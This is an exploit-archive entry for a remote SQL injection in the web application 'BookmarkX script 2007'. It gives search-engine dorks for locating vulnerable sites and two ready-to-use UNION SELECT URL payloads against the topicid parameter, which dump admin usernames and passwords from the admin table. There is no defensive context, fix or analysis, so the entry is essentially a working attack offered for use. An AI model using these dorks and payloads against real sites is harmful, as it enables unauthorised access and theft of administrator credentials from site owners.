BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability

2008-02-02T00:00:00
ID 1337DAY-ID-2588
Type zdt
Reporter [email protected]
Modified 2008-02-02T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability
==================================================================



#########################################################################
#
# BookmarkX script(Powered by GengoliaWebStudio)SQL Injection
#
#
#########################################################################
# DorKs 1 : "2007 BookmarkX script"
#
# DORKS 2 : Powered by GengoliaWebStudio
#
# DORK 3 : allinurl :"index.php?menu=showtopic"
#
#########################################################################
# EXPLOIT :
#
index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

or

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1





#  0day.today [2018-04-12]  #